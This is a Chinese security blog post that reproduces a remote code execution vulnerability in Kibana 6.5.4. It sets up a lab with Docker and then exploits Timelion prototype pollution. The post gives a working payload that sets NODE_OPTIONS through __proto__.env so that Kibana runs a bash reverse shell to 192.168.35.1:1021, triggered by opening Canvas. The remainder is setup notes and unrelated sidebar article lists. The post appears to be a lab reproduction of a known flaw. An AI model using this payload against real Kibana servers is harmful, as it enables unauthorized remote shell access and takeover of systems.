更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

使用docker快速部署环境
docker pull kibana:6.5.4
docker pull elasticsearch:6.5.4
docker run -d --name elasticsearchnew -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4
docker run -d -p 5601:5601 --link elasticsearchnew  -e "ELASTICSEARCH_URL=http://192.168.35.185:9200" kibana:6.5.4
参数简单介绍下
-p: 代表指定的宿主机的端口和容器端口的映射 -d: 代表启动该容器后的进程为守护进程的方式运行 -e: 代表设置容器变量

注意 这里其实有个坑  如果你的浏览器访问后出现如下图

那么你是需要确定下 你的kibana与elasticsearch版本是否一致

后面还有个坑 可能是我浏览器缓存的问题 如下图 同样的地址 左侧浏览器正常访问 右侧却出现错误?

大约十分钟后我再次刷新 右侧浏览器已经恢复正常

开始利用 点击timelion 输入如下语句
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.35.1/1021 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

点下右下角的按钮 然后开始监听下端口  回到页面 点击canvas模块成功触发漏洞 成功反弹shell

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

最新文章

  1. AngularJS 源码分析1
  2. 创建自定义的Cocos2d-x场景
  3. Model1模式的学生信息增删改查
  4. IOS基础之 (七) 分类Category
  5. poj 2195 二分图带权匹配+最小费用最大流
  6. zoj 3228 覆盖及非覆盖串的多次匹配
  7. android github
  8. Flex 对Java端返回Collection的处理方法
  9. C#异常类总结
  10. ObjectInput read方法的坑
  11. AngularJs学习笔记5——自定义服务
  12. Adobe Acrobat Pro 9破解
  13. 从实战出发,谈谈 nginx 信号集
  14. 算法导轮之B树的学习
  15. 利用gradle添加构建版本号
  16. spring boot集成FastDFS
  17. 【微服务No.2】polly微服务故障处理库
  18. python 读写文件中 w与wt ; r与rt 的区别
  19. Python_函数_参数
  20. 解决space-between最后一排问题

热门文章

  1. 【题解】Luogu P4910 帕秋莉的手环
  2. 【ABAP】第一章-基础
  3. AspNetCore网关集成Swagger访问使用IdentityServer保护的webapi项目
  4. PKPM BIMViewer的使用
  5. 实现负载均衡的小demo
  6. iOS - 外加字体(只需三步-教你轻松实现)
  7. 【转载】 C#中使用CopyTo方法将List集合元素拷贝到数组Array中
  8. 如何获取jar包中resource下的文件
  9. win10开启redis失败解决方案
  10. 0001-代码仓库-git 命令